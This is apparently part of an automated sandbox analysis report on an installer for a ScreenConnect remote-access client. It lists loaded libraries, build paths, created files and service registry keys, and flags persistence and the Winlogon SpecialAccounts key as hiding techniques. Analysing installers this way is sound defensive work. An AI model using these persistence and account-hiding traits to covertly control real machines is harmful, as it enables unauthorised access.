Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Section loaded: winnsi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: apphelp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: amsi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: userenv.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: urlmon.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: iertutil.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: srvcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: netutils.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: propsys.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: windowscodecs.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: amsi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: userenv.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: urlmon.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: iertutil.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: srvcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: netutils.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: propsys.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: windowscodecs.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: wtsapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: winsta.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: netapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Section loaded: wkscli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: setup.msi | Static file information: File size 13422592 > 1048576
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1743177364.0000000001432000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Client.dll.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2905272548.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1743451963.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1743291281.00000000014D2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1743239856.0000000001490000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1702671144.0000000000282000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000006.00000000.1693323566.000000000058D000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.ClientService.exe.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1745717317.000000001BCB2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000003.00000003.1671136153.0000000004B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668960516.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.3.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: setup.msi, MSI15E9.tmp.1.dr, 5c1176.rbs.1.dr, MSI160A.tmp.1.dr, 5c1175.msi.1.dr, MSI17FF.tmp.1.dr, 5c1177.msi.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr
Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1702671144.0000000000282000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.3.dr
Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: setup.msi, 5c1175.msi.1.dr, MSID3F.tmp.0.dr, 5c1177.msi.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1745717317.000000001BCB2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1743177364.0000000001432000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Client.dll.1.dr
Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr
Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: rundll32.exe, 00000003.00000003.1668960516.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1745103235.000000001BA72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll.3.dr
Source: ScreenConnect.Client.dll.1.dr | Static PE information: 0xB8CD3C5A [Sat Mar 31 22:21:14 2068 UTC]
Source: MSID3F.tmp.0.dr | Static PE information: real checksum: 0x2f213 should be: 0x115ce6
Source: MSI17FF.tmp.1.dr | Static PE information: real checksum: 0x0 should be: 0x3d8a7
Source: MSI160A.tmp.1.dr | Static PE information: real checksum: 0x0 should be: 0x3d8a7
Source: ScreenConnect.WindowsAuthenticationPackage.dll.1.dr | Static PE information: section name: _RDATA
Source: ScreenConnect.WindowsCredentialProvider.dll.1.dr | Static PE information: section name: _RDATA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_04E171A1 push esp; retf 3_3_04E17170
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_01531320 pushad ; retn 0003h 6_2_01531321
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_01537754 push 8403CACFh; iretd 6_2_01537759
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_01537738 push eax; iretd 6_2_01537739
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_03E0AFF8 push ebp; retf 6_2_03E0B03B
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_03E0AFA0 push ebp; retf 6_2_03E0B03B
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_03E0AE37 push edi; retf 6_2_03E0AE3B
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_03E0B3DF push edx; retf 6_2_03E0B3E3
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_03E0B31F push edx; retf 6_2_03E0B33B
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_03E0B2C0 push ebx; retf 6_2_03E0B2D3
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_03E0B21F push ebx; retf 6_2_03E0B233
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_03E0B080 push ebp; retf 6_2_03E0B0D3
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_03E03BE8 push FFFFFFCDh; retf 6_2_03E03C5E
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_03E07A4C push FFFFFF8Fh; retf 6_2_03E07A5E
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_03E0FF6A push es; retf 6_2_03E0FF6B
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_03E0FF6C push es; retf 6_2_03E0FF83
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_03E0FEFC push es; retf 6_2_03E0FF53
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_051A0740 pushad ; ret 6_2_051A0753
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_051A4191 push esp; ret 6_2_051A41A3
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_051A10F7 push ss; retf 6_2_051A1106
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_056B27B2 push ss; retf 6_2_056B27BE
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function: 6_2_056B4D1F push ss; retf 6_2_056B4D2E
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 7_2_00007FFD9B717D94 push ss; iretd 7_2_00007FFD9B717D95
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B72279F push ss; iretd 8_2_00007FFD9B7227A6
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B72AA06 push esi; ret 8_2_00007FFD9B72AA07
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B73106D push ebx; ret 8_2_00007FFD9B731072

Persistence and Installation Behavior

Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
Source: c:\program files (x86)\screenconnect client (de5851ad6e374ce3)\screenconnect.windowscredentialprovider.dll | COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-406f-012c01771397}\inprocserver32
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.Compression.dll
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.WindowsInstaller.dll
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.Core.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI160A.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.Compression.Cab.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSID3F.tmp
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.Windows.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI17FF.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.InstallerActions.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
Source: ScreenConnect.ClientService.dll.1.dr | Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (de5851ad6e374ce3)

Hooking and other Techniques for Hiding and Protection

Source: rundll32.exe, 00000003.00000003.1668960516.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2905272548.00000000024D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1743451963.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1745717317.000000001BCB2000.00000002.00000001.01000000.0000000D.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1743291281.00000000014D2000.00000002.00000001.01000000.0000000B.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1743239856.0000000001490000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.ClientService.dll.1.dr | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll.3.dr | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.Windows.dll.1.dr | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe    Process information set: NOOPENFILEERRORBOX    (62 identical entries)
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe    Process information set: NOOPENFILEERRORBOX    (101 identical entries)
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
